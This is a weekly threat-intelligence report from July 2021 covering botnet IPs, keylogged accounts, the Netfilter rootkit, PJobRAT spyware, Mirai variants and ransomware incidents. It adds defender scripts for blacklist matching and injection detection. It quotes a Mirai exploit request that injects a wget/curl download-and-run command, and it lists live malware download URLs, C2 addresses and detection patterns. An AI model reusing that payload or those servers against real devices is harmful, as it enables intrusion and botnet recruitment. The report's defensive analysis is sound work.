Activity Summary - Week Ending 2 July 2021


Page 1: Activity Summary - Week Ending 2 July 2021

TLP GREEN

© 2021 Red Sky Alliance Corp. All rights reserved. 1

INTELLIGENCE REPORT: ALL SECTOR CYBER THREATS SER. NO.: IR-21-183-001

Activity Summary - Week Ending 2 July 2021:

• Red Sky Alliance identified 19,270 connections from new unique IP addresses

• Analysts identified 2,543 new IP addresses participating in various Botnets

• 13 unique email accounts compromised with keyloggers were observed

• Netfilter

• PJobRAT Spyware

• Mirai Knockoffs

• Salvation Army Hit

• Conti & Canada

• DragonForce / Israeli Banking

• Fancy Lazarus attempts an attack on German Banks - Denied

COMPROMISED EMAIL ACCOUNTS

Below are the Top 10 Keylogger emails and the Top Attacker Servers (C2) observed on 2 July 2021 through our Red Sky Alliance proprietary collection and analysis data. On 28 June 2021, Red Sky Alliance observed 13 unique email accounts compromised with keyloggers which were used to log into mostly personal accounts.

Keylogger: Email        Times Seen
[email protected]        12
[email protected]        12
[email protected]        12
[email protected]        12
[email protected]        7
[email protected]        7
[email protected]        6
[email protected]        2
[email protected]        2
[email protected]        2

Attacker Server (C2)    Times Seen
[email protected]        60
[email protected]        52
[email protected]        45
[email protected]        8
[email protected]        6

Table 1: The top two keylogged emails are: [email protected] - This is a Russian account possibly spoofing vad-vmd-05m of Continental Hydraulics in Minnesota, US. This name is associated with several social media accounts. Regardless, it is keylogged and should be avoided. [email protected] - Luci Baron is a young person who may have been keylogged. This is a Gmail account. These and all of this week’s keylogged emails should be blacklisted. Call us for a full list.


Table 2: The top observed attacker server (C2) is being used by attackers to maintain communications with compromised systems within a target network. [email protected] and [email protected] have been compromised for many months. This attack server should be blacklisted. Contact Red Sky Alliance for more C2 indicators.

COMPROMISED (C2) IPs

MALWARE ACTIVITY

On 28 June 2021, Red Sky Alliance identified 19,270 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.

On 28 June 2021, analysts identified 2,543 new IP addresses participating in various botnets (call for the full .csv blacklists; below is only a small sampling of botnet trackers).

IP                 Contacts
135.181.213.169    65
185.158.115.77     24
129.213.62.230     15
54.39.29.64        14
191.101.217.20     13
147.147.220.127    12
147.147.220.9      11
95.25.211.239      10
62.210.205.65      10
18.189.7.149       10

Malware Variant    Times Seen
sality             17082
corkow             1168
sykipot            243
loki               221
shiz               201
koobface           148
wcry_ransom        123
maudi              102
poweliks           89
betabot            84

135.181.213.169 – Hetzner Online GmbH, address: Industriestrasse 25, D-91710 Gunzenhausen, Germany, ASN: AS24940, CIDR: 135.181.0.0/16

185.158.115.77 – Vnukovo Ip Server Llc, address: st. Shabolovka, 34, building 3, 115419 Moscow, Russia, ASN: AS44812, CIDR: 185.158.115.0/24

Top 10 Malware Variants and number of contacts. Sality and Corkow have consistently remained the top variants, followed by Sykipot malware.


Recorded Future Top 5 Threat Actors and Malware for 30 June 2021 (rankings change daily)

First Seen             Botnet Attribution        Infected Host’s IPv4 Address
2021-06-24T21:02:34    SOCKS4 proxy|port:4145    1.0.243.175
2021-06-22T10:51:48    SOCKS4 proxy|port:4145    1.1.155.193
2021-06-22T06:13:12    SOCKS4 proxy|port:4145    1.1.223.117
2021-06-20T07:53:03    HTTP proxy|port:8080      1.2.189.45
2021-06-23T13:01:07    SOCKS4 proxy|port:4145    1.4.169.139
2021-06-26T10:10:58    SOCKS4 proxy|port:5678    1.10.189.108
2021-06-22T06:51:49    HTTP proxy|port:8080      1.20.191.168
2021-06-22T13:12:29    SOCKS4 proxy|port:4145    1.160.26.99
2021-06-22T03:33:10    SOCKS4 proxy|port:4145    1.160.34.69
2021-06-22T23:11:30    SOCKS4 proxy|port:4145    1.160.39.204

Blacklist data is crucial in proactive network security, as it allows companies to defend against network attacks before they are targeted, giving them the opportunity to prevent attacks rather than react to an internal attack. Our blacklists provide cyber professionals insight into trending attacks and help identify sources of malicious emails, malicious websites, and other sources of malware infection. Please contact Red Sky Alliance for a full .csv blacklist data subscription.

This past week, there have been continued cyber-attacks seen throughout the world. The results of a malicious attack can put you out of business – prepare today.
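As an added example (not part of the Red Sky Alliance report and not the service's own tooling), the following Python script shows one way a defender puts a blacklist like the one above to work: it loads the sampled botnet tracker IPs together with the two CIDR blocks quoted for the top two sources, then scans firewall log lines for connections to or from any listed address, reporting the most specific entry that matched. The log lines are constructed for the example; the key=value layout, the field names and the 10.0.0.0/8 internal addresses are assumptions.

```python
import ipaddress
import re
from collections import Counter

# Blacklist entries taken from the report: the sampled botnet tracker IPs and
# the two CIDR blocks quoted for the top two sources.
BLACKLIST = [
    "135.181.213.169", "185.158.115.77", "129.213.62.230", "54.39.29.64",
    "191.101.217.20", "147.147.220.127", "147.147.220.9", "95.25.211.239",
    "62.210.205.65", "18.189.7.149",
    "135.181.0.0/16", "185.158.115.0/24",
    "not-an-address",  # malformed entry, kept to show it is skipped, not fatal
]

# Constructed firewall log lines (not from the report); the key=value layout,
# field names and 10.0.0.0/8 internal addresses are assumptions for the example.
SAMPLE_LOG = """\
2021-06-28T10:01:12Z action=allow src=10.0.0.15 dst=135.181.213.169 dport=443
2021-06-28T10:01:15Z action=allow src=10.0.0.15 dst=93.184.216.34 dport=443
2021-06-28T10:02:40Z action=deny src=185.158.115.77 dst=10.0.0.15 dport=3389
2021-06-28T10:03:02Z action=allow src=10.0.0.22 dst=135.181.7.9 dport=80
2021-06-28T10:03:09Z action=allow src=10.0.0.22 dst=18.189.7.149 dport=8080
2021-06-28T10:04:00Z action=allow src=10.0.0.9 dst=185.158.114.77 dport=443
"""


def load_blacklist(entries):
    """Parse bare IPs and CIDRs into ip_network objects (a bare IP becomes /32).
    Sorted longest-prefix first so a hit reports the most specific entry."""
    nets = []
    for entry in entries:
        try:
            nets.append(ipaddress.ip_network(entry.strip(), strict=False))
        except ValueError:
            continue  # one bad line must not abort the whole feed load
    return sorted(nets, key=lambda n: n.prefixlen, reverse=True)


def match_address(addr, nets):
    """Return the first (most specific) network containing addr, or None."""
    ip = ipaddress.ip_address(addr)
    for net in nets:
        if ip in net:
            return net
    return None


ADDR_RE = re.compile(r"\b(src|dst)=(\d{1,3}(?:\.\d{1,3}){3})\b")


def scan_log(text, nets):
    """Check every src/dst address in the log against the blacklist.
    Returns (hits, per_net): hits are (line_no, direction, ip, matched_network)
    tuples; per_net counts hits per blacklist entry for a quick triage view."""
    hits, per_net = [], Counter()
    for line_no, line in enumerate(text.splitlines(), 1):
        for direction, addr in ADDR_RE.findall(line):
            net = match_address(addr, nets)
            if net is not None:
                hits.append((line_no, direction, addr, str(net)))
                per_net[str(net)] += 1
    return hits, per_net


if __name__ == "__main__":
    nets = load_blacklist(BLACKLIST)
    hits, per_net = scan_log(SAMPLE_LOG, nets)
    for hit in hits:
        print("line %d: %s=%s matched %s" % hit)
    print(dict(per_net))
```

Note that 185.158.114.77 on the last log line is not flagged: it lies outside the 185.158.115.0/24 block the report gives, which is the reason to match on real networks rather than on string prefixes.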


MALICIOUS CYBER TRENDS 1

Netfilter—Rootkit Signed With a Valid Digital Certificate – FortiGuard Labs is aware of reports of a recently discovered rootkit named Netfilter. Netfilter, discovered by security researcher Karsten Hahn, uses signed certificates to evade detection. Signed malware carrying valid digital certificates is often used by threat actors to evade detection, as such files are trusted by antivirus and other endpoint security software. Because a company or organization is vetted by a certificate authority (CA) before a digital certificate is issued, operating systems and antivirus software treat files signed with these certificates as clean, which ultimately allows the file(s) to operate with impunity. What makes this latest discovery unique is that the signatures are valid Microsoft signatures. Details are not available at this time as to how these Microsoft certificates were used to sign the malware. Fortinet customers currently running the latest definition sets are protected against known Netfilter samples. Find more details in our technical FAQ here.

Signatures: W64/Agent.AOD!tr, W64/MalDrv.AOD!tr, W32/Agent.ADFG!tr, W64/Agent.L!tr, W32/Agent!tr, W32/PossibleThreat, W32/UPXHack.A, PossibleThreat.FAI

Indicator(s):

• 63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0

• d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe

• 4a229ab274e364df92cc46ecbc9faab32f7b0955dab982658313f2faf9410863

• a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac4

• bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a

• bff9b75ae2eea49a765f79d9c67c997edb6c67a2cc720c6187dd2f67980acab7

• f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca

Web Filtering - Indian Military Personnel being targeted using PJobRAT Spyware – Researchers discovered an ongoing attack campaign targeting the Indian military. The malware is named PJobRAT and is built for Android. The first attack using this malware was in January 2021, though the RAT family is speculated to have first appeared in December 2019. The attacker focuses only on Indian personnel who have a military background. PJobRAT is disguised as the current version of the marriage and Indian dating application Trendbanter. Analysis of the malware found that it only uploads files with specific extensions from the phone: PDF, PPT, DOC, XLS, DOCX, PPTX and XLSX. Through the auxiliary function of Android, the malware is able to retrieve personal information from WhatsApp conversation messages.

The features of this malware include:

• Recording

• Upload SMS

• Upload address book

• Upload image file

• Upload audio files

• Upload a list of external storage files

• Update phone number

1 Fortinet Intel Blog, 06 25 2021


• Upload video file

• Upload a list of installed apps

• Upload Wi-Fi, geographic location, and other information

The malware uses only two types of communication: Firebase Cloud Messaging (FCM) and HTTP. Once it runs on a mobile phone, it carries out the activities listed above, gathers the information from the victim and sends it to the attacker through the command-and-control server; the data is pushed via the FCM message push function. FortiGuard Labs has classified all related IOCs.

Indicator(s):

• 144[.]91[.]65[.]101/senewteam2136/mainfiles/file_handler[.]php

• 144[.]91[.]65[.]101/senewteam2137/mainfiles/file_handler[.]php

• 144[.]91[.]65[.]101

• helloworld[.]bounceme[.]net/axbxcxdx123/test[.]php

• helloworld[.]bounceme[.]net

Mirai Knockoffs / Fortinet Research Blog – Five years have passed since the source code of MIRAI IoT malware was released to the public (2016). This led to numerous copycats, creating their own tactics of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same. IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. These hackers seek to exploit known—and sometimes even zero-day—vulnerabilities to increase their chances of gaining access. And once they do, malicious binaries are downloaded and executed that make the device part of a zombie network that could then be instructed to participate in a Distributed Denial-of-Service (DDoS) attack that could cause a service outage to an unfortunate target. Some threat actors even sell these new botnets as a service. Researchers have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT device with the help of a honeypot system.

So, where do these attacks come from? To simulate what it would be like for a new IoT device to be connected to the Internet for the first time, Fortinet set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute-force attacks. The statistics in this article were taken from a three-week period. On average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. Nearly 4000 of those attacks were identified and connected to a Mirai-related malware family. Since this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table.

Figure 1. Unique telnet source IPs per country

Top IoT Malware Variants - Mirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands were successfully executed in the device—although this could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.

The figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device. These strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.

Based on the attacks received by the honeypot, the following table shows the top 10 variants we were able to identify.

The Enigmatic Hajime - Hajime was titled as the successor to the first generation of Mirai. Built on the same principle and goals as its predecessor, it tries to propagate to IoT devices by brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown. Aside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instructs bots to download and execute binaries, internally called "modules". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Additionally, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.

And it delivers the following message to the device’s terminal: “Just a white hat, securing some systems. Important messages will be signed like this! Hajime Author. Contact CLOSED Stay sharp!”

Figure 2. Top ten identified variants

Figure 3. Sample shell commands executed by a SORA bot


It was only a matter of time before some speculated that Hajime might be the work of a real vigilante.

SYLVEON Coming Out of Retirement? What surprised Fortinet was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year-old European IoT malware author that went by the names “Light The Sylveon” and “Light The Leafeon”. When researchers took a quick look at the decrypted strings of one of the captured binaries, the word “Leafeon” was found, creating speculation that this might be the author’s comeback.

“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands–very similar to BrickerBot. From the malware authors’ perspective, based on a message embedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.” Eventually, the “Light The Sylveon” author announced through a post on his Twitter account that he was going to abandon the project. Unlike SILEX, however, SYLVEON is a conventional IoT malware that is clearly based on the Mirai source code with some added attacks. Interestingly enough, the group greek.Helios and a certain Thar3seller, a group previously associated with other IoT malware campaigns, currently claim to be the authors of this variant. The relationship between these different authors is still unclear. What we are certain about is that this variant is being actively operated, as also shown by recently updated binaries found on one of its download servers.

Figure 4. Function name list found in a SYLVEON binary.

Figure 5. Open directory hosting SYLVEON variant


SORA - The Surviving Member of the Wicked Family. It is interesting to see Mirai variants that were authored by the threat actor known as Wicked that we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observations, it seems that SORA has more successfully survived than its siblings.

Mirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities - Aside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list.

A few weeks ago, it added several more exploits, two of which are recent:

• OptiLink ONT1GEW GPON Remote Code Execution (formTracert function)

• CVE-2021-1498 (Cisco HyperFlex HX Remote Code Execution)

• CVE-2021-31755 (Tenda Router AC11 Remote Code Execution)

• (Unidentified target)

Figure 6. Strings found in a SYLVEON binary

Figure 7. Sample request

Here is a list of other vulnerabilities this malware variant tries to exploit:

Vulnerability                     Description
CVE-2021-22986                    F5 iControl REST Remote Code Execution
CVE-2009-4490                     mini_httpd 1.18 Escape Sequence
CVE-2018-10088                    XiongMai uc-httpd Buffer Overflow
CVE-2020-28188                    TerraMaster TOS Remote Code Execution
CVE-2020-29557                    D-Link DIR-825 Buffer Overflow
CVE-2020-25506                    D-Link DNS-320 Remote Code Execution
CVE-2021-22502                    Micro Focus OBR Remote Code Execution
CVE-2021-27561/CVE-2021-27562     Yealink DM (Device Management) Remote Code Execution
CVE-2021-22991                    F5 BIG-IP Buffer Overflow
VisualDoor (2021-01-29)           SonicWall SSL-VPN Remote Code Execution
Unknown 2                         key parameter on /cgi-bin/login.cgi leading to Remote Code Execution

Sample request:

    POST /cgi-bin/login.cgi HTTP/1.1
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

    key=';`cd /tmp; wget http://{REDACTED IP}/lolol.sh; curl -O http://{REDACTED IP}/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;`;#
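The sample request above is what a defender wants to catch in web server or WAF logs before the device ever runs it. The Python below is an added example, not Fortinet's or Red Sky Alliance's code: it parses a raw HTTP request, decodes the form body by hand (the payload relies on ';', which older versions of parse_qs treat as a separator), and flags parameter values that carry shell metacharacters or a fetch-then-run chain of the kind MANGA sends. The three requests it inspects are constructed to mirror the sample, with RFC 5737 documentation addresses standing in for the redacted IP; none is taken from a real log.

```python
import re
from urllib.parse import unquote_plus

# Signs of shell command injection in a form field: command separators,
# backticks or subshells, and a fetch-then-run chain as in the MANGA sample.
SHELL_META = re.compile(r"[;`|&]|\$\(")
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl|tftp)\b.*\b(chmod|sh|bash)\b", re.S)

# Constructed requests (not from any log): the first mirrors the shape of the
# MANGA sample with RFC 5737 documentation addresses, the second is a normal
# login, the third is benign text that merely mentions tool names.
MALICIOUS = (
    "POST /cgi-bin/login.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
    "\r\n"
    "key=';`cd /tmp; wget http://198.51.100.7/lolol.sh; curl -O http://198.51.100.7/lolol.sh; "
    "chmod 777 lolol.sh; sh lolol.sh;`;#"
)
BENIGN = (
    "POST /cgi-bin/login.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "key=s3cret%21&user=alice"
)
NOISY = (
    "POST /feedback HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "comment=we+use+curl+and+sh+scripts+daily"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form(body):
    """Decode application/x-www-form-urlencoded splitting on '&' only, so a ';'
    inside a value stays part of the value instead of starting a new field."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def inspect_request(raw):
    """Return one finding per suspicious form field; [] for clean or non-form requests."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    findings = []
    for name, values in parse_form(body).items():
        for value in values:
            reasons = []
            if SHELL_META.search(value):
                reasons.append("shell metacharacters")
            if DOWNLOAD_EXEC.search(value):
                reasons.append("download-and-execute chain")
            if reasons:
                # Both signals together is the MANGA pattern; one alone is worth a look.
                findings.append({"path": path, "param": name, "reasons": reasons,
                                 "severity": "high" if len(reasons) == 2 else "medium"})
    return findings


if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS), ("benign", BENIGN), ("noisy", NOISY)):
        print(label, inspect_request(req))
```

The third request shows why the two signals are scored rather than treated as equal: ordinary text that names curl and sh trips the chain pattern alone and is reported at medium severity, while the injection carries both signals. Decoding the body before matching matters as well; an attacker can percent-encode the separators, and matching on the raw bytes would miss them.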


Analyst conclusion - As the number of installed IoT devices continues to explode, especially given the current lack of security standards available to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this article. And interestingly, Mirai variants are still very active in terms of attack and development.

IOCs: MANGA

Files (SHA256):
25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd
5312cb57d8c38ab349a9d67db65c66a733758cb29eb118c958ede11a98322c8a
6075c917e2b25ff2def7cdb3019e0ad725a02387c9e1e83cb6514bd410c8f928
fd2aed69644ff8edcc501945ca5e83d548c6c346d3e92c922eeb3f5da03f9b8d
626e1a247045dff09c4b6aa5de8d9b9d1d385846306a359587f42b60d4413258
68601bae31381d2205dd16df1f2aff52592f9a9aad71ea5f60f68321c6aea579
40066f30b72b4184b33e834712832879f8814ddaf56c71f33bbaacb890c350f0
51ffd3c3e1b10b629692b3b1120c777388ae73c61469bb2926d2a70a457ea14d
fee1a5ceea21f14b60f0d632a2889bf3ef81f45eb783e53ada44b9b2f8e4a4a
7df6c4d3bc4f528c5928e3ef09feb532e3407f893af02c16437e669390d6a09f
eb64753c578138157eeff8ba1087a94538f1337bd4c6d09ac26806cb12ff69c1
ef57d97bffb2ef7a435fe6668d0aba12196cd91ee1cd3d5446ad525995b76b8d
c9845823a32b9b5ff59f76771c90e4f23c8f94e9013051797cfd4efdf43c4d4f
1a2bc7e97c73efbbbe4a7ad0f577c2b3585f1fe15a3fdb82bd79f13906d838d0
ca9965127cfdae9e2d8b228af0ab691589ac27cc5ca17a3377de2e8551b64f9f
49e5ba121c216146cdcf63ebade1853a3710fa266f8c456e3dcee0565e6bdbb1
1bb9bda36b1d2a8963e5a2687ce4645a02805ad0ccb74a0b234cdb9503fdd8e3
f19c64746eddcd33daa30df9c9f282863ad05b22e2f143382f0ab18547cd6497
ec7f7a791e7bca70b5143bbe9064124ae05cdfc13a3c7ab295b6f555eda1ed7d

Download URLs

• http[:]//212.192.241.72/bins/dark.mpsl

• http[:]//212.192.241.72/bins/dark.arm5

• http[:]//212.192.241.72/bins/dark.arm6

• http[:]//212.192.241.72/bins/dark.arm7

• http[:]//212.192.241.72/bins/dark.x86

• http[:]//212.192.241.72/bins/dark.ppc

• http[:]//212.192.241.72/bins/dark.mips

Hajime

Files (SHA256):
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3

Download URLs

• http[:]//121.121.122.176:29641/.i

• http[:]//121.162.45.6:38828/.i

• http[:]//125.227.193.220:38674/.i

• http[:]//130.164.183.217:62624/.i

• http[:]//14.42.160.123:19634/.i

• http[:]//147.234.71.142:7011/.i

• http[:]//171.232.247.121:63812/.i

• http[:]//171.247.233.69:36829/.i

• http[:]//175.115.103.118:8450/.i

• http[:]//178.116.76.54:20060/.i

• http[:]//183.108.201.171:32745/.i

• http[:]//184.82.56.195:58027/.i

• http[:]//187.233.194.166:3181/.i

• http[:]//187.37.198.126:14552/.i


• http[:]//189.132.235.210:43064/.i

• http[:]//189.173.97.200:41775/.i

• http[:]//190.18.221.214:51789/.i

• http[:]//2.45.4.24:50436/.i

• http[:]//201.105.177.84:25768/.i

• http[:]//210.99.125.95:56779/.i

• http[:]//211.107.151.26:26593/.i

Sample commands after gaining access:

SYLVEON

Files (SHA256):
2bdd553ad6485d11844c6cb68ae63f083c7f2ee6029f128a1521427e9a29aad5
311ac01e395d96f8017ef95dfa9ee8f00aa527e02cfcd207de371e04e5aed023
4a4b8fdbe2cff3547e6d808226d34cf6059d9160326326d3b90d851e602035d8
7edb2ff320e99a1b92c7fa51dcd485edbc15eb4d23520ee26ed0d42600a733a1
4bbf2dab9cce066bab887e0058150157f0417d6dceca64025ce2127a8eb584b0
208ae3086c769098f1a55ac6d88fb760571010c16f4a0e25c98ee0d33d4bdbbc
fac943c6173cf183e53bea76d4f6b07dbb455ec3dc98dda71164267fc7e1dbb4

Download URLs:

• http[:]//31.210.20.138/uwu/arm6

• http[:]//31.210.20.138/uwu/ppc

• http[:]//31.210.20.138/arm6

• http[:]//31.210.20.138/sh4

• http[:]//45.153.203.219/uwu/arm6

• http[:]//45.95.169.110/bins/m68k

Sample commands after gaining access:
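The indicator listings above are defanged (http[:]//, [.]) and one SHA256 in the MANGA list is only 63 hex characters long, so they cannot be pasted straight into a blocklist. The Python below is an added example, not code from the report or from Fortinet: it refangs an excerpt of those listings, separates URLs, IPv4 addresses, hostnames and well-formed SHA256 hashes, quarantines malformed hashes, and then matches the hosts against proxy log lines. The excerpt and the log lines are constructed for this example (the indicator values are copied from the listings, the log traffic is invented), and the regular expressions are a deliberately simple assumption rather than a full IoC grammar.

```python
import re
from urllib.parse import urlsplit

# Constructed excerpt of the indicator listings in this report, values exactly
# as printed there (still defanged). The last hash is the 63-character entry
# from the MANGA list, kept to show that length validation rejects it.
REPORT_EXCERPT = """\
Download URLs
http[:]//212.192.241.72/bins/dark.mpsl
http[:]//121.121.122.176:29641/.i
144[.]91[.]65[.]101/senewteam2136/mainfiles/file_handler[.]php
helloworld[.]bounceme[.]net/axbxcxdx123/test[.]php
helloworld[.]bounceme[.]net
Files (SHA256)
25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd
fee1a5ceea21f14b60f0d632a2889bf3ef81f45eb783e53ada44b9b2f8e4a4a
"""

# Constructed proxy log lines (not from the report): time, client, method, URL, status.
PROXY_LOG = """\
2021-06-28T09:00:01Z 10.0.0.5 GET http://helloworld.bounceme.net/axbxcxdx123/test.php 200
2021-06-28T09:00:07Z 10.0.0.8 GET http://www.example.com/index.html 200
2021-06-28T09:01:30Z 10.0.0.5 GET http://212.192.241.72/bins/dark.arm7 404
"""


def refang(text):
    """Undo the defanging conventions used in published reports."""
    return (text.replace("[:]", ":").replace("[.]", ".")
                .replace("hxxps://", "https://").replace("hxxp://", "http://"))


URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Hostnames not preceded by '/' or a word character, so path components such
# as bins/dark.mpsl or file_handler.php are not mistaken for domains.
HOST_RE = re.compile(r"(?<![/\w.])(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
HEX_RE = re.compile(r"\b[0-9a-fA-F]{32,}\b")


def extract_indicators(text):
    """Return sorted lists of urls, ipv4, domains, sha256 and malformed hashes."""
    clean = refang(text)
    urls = set(URL_RE.findall(clean))
    ipv4 = set(IPV4_RE.findall(clean))
    domains = {h.lower() for h in HOST_RE.findall(clean)}
    for url in urls:  # make sure every URL's host is also a bare indicator
        host = urlsplit(url).hostname
        if host:
            (ipv4 if IPV4_RE.fullmatch(host) else domains).add(host.lower())
    sha256, malformed = set(), set()
    for h in HEX_RE.findall(clean):
        # Only a 64-hex string is a SHA256; anything else in a SHA256 list is
        # a transcription error and must not enter a blocklist as-is.
        (sha256 if len(h) == 64 else malformed).add(h.lower())
    return {k: sorted(v) for k, v in (("urls", urls), ("ipv4", ipv4), ("domains", domains),
                                      ("sha256", sha256), ("malformed", malformed))}


def check_proxy_log(log_text, indicators):
    """Match the host of each requested URL (not the full URL, so a new path on
    a known download server still hits) against the extracted hosts."""
    watch = set(indicators["ipv4"]) | set(indicators["domains"])
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 4:
            continue
        host = urlsplit(parts[3]).hostname
        if host and host.lower() in watch:
            hits.append((line_no, parts[1], host.lower()))
    return hits


if __name__ == "__main__":
    ind = extract_indicators(REPORT_EXCERPT)
    for kind, values in ind.items():
        print(kind, values)
    print(check_proxy_log(PROXY_LOG, ind))
```

Matching on the host rather than the full URL is deliberate: the third log line requests dark.arm7, a path that is not in the excerpt, from a download server that is, and it is still reported. The malformed bucket is for a human to resolve against the original source; silently dropping or padding the 63-character value would either lose the indicator or create a hash that matches nothing.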

GLOBAL TRENDS:

UK / Salvation Army (Charity) - The Salvation Army (SA) in England has been hit by a ransomware attack. It is reported the Christian charity organization is negotiating with the attackers over the stolen data. UK media is reporting the Salvation Army first noticed the attack around a month ago, which is believed to have affected a London data center used by the charity.2 A Salvation Army spokesperson confirmed the attack took place and that the UK’s Information Commissioner’s Office (ICO) has been informed: “We are investigating an IT incident affecting a number of our corporate IT systems. We have informed the Charity Commission and the ICO, are also in dialogue with our key partners and staff and are working to notify any other relevant third parties.” The SA said that none of its services for vulnerable people had been affected. As of 1 July, there is no further information about the cyber-attack, such as the attackers' identity or the data accessed. As of this same date, no data has appeared on any known ransomware gang sites. The Salvation Army staff and volunteers have been advised by authorities to keep a close watch for any unusual banking activity from their accounts or suspicious communication they receive. This cyber-attack has further demonstrated that no organization is safe when it comes to ransomware and must be prepared to face attacks at any time. A systems engineering manager at Infoblox said, “This latest attack on the UK arm of the Salvation Army shows that ransomware is growing in sophistication and that actors are getting bolder. No organization is off-limits, even those in the charity sector. When it comes to ransomware, the only truly effective approach is prevention. If an unprotected system gets attacked, there is no way to guarantee the retrieval or decryption of data. Mitigating risk before an attack can happen is the most effective defense an organization can have. Security solutions – such as those that leverage DNS – that can interrupt the malware's attempt to connect to the command-and-control server, as well as frequent and robust backups, are key. All organizations - regardless of size or sector - should expect ransomware attacks and prepare accordingly.”

The CEO at CybSafe added, “Sadly, this latest incident is just one of a spate of ransomware attacks to have occurred over recent months. Schools, healthcare services and charities such as the Salvation Army are being increasingly targeted by malicious actors who view them as soft targets. Given the growing frequency of these attacks, it’s never been more important for organizations and individuals to take the necessary measures to protect themselves online. We need to move beyond basic awareness training and more seriously consider the human aspect of cybersecurity. As these attacks become more sophisticated, they also become more personalized, and therefore an approach towards cybersecurity must mirror this if organizations and individuals are to successfully fend off such threats.”

2 https://www.infosecurity-magazine.com/news/salvation-army-ransomware-attack/

Conti & Canada - Three more Canadian companies have been listed on a ransomware group’s website as being victims of their attacks. The firms are an internet provider in southwestern Ontario, an engineering firm in eastern Ontario and an insurance broker in Quebec. The Conti ransomware group says it has stolen data from all three, and as proof posted copies of what it says are some of the files. The Conti group has a reputation of not bluffing. The three are either small or medium-sized firms, more evidence that ransomware gangs and their affiliate partners, who actually do the targeting, are not just after big companies.3 There were lots of headlines earlier this year when the US, Canada and other countries blamed a Russian-based threat group for being behind the compromise of the SolarWinds Orion network management platform. Despite all the attention the group is still active, according to Microsoft. The company said Friday that the group, which it calls Nobelium, has recently been trying to break into targeted organizations in Canada, the US, Germany and other countries. Although most attempts were unsuccessful, Microsoft admitted that the computer of one of its customer support staff was hacked. Stolen customer information from that hack was used by Nobelium to try to get into their organizations. Nobelium mainly targets IT-related companies and governments but has also been seen going after think tanks and financial services firms. In addition to using stolen information to try to get into organizations, Nobelium uses password spray and brute-force password attacks.

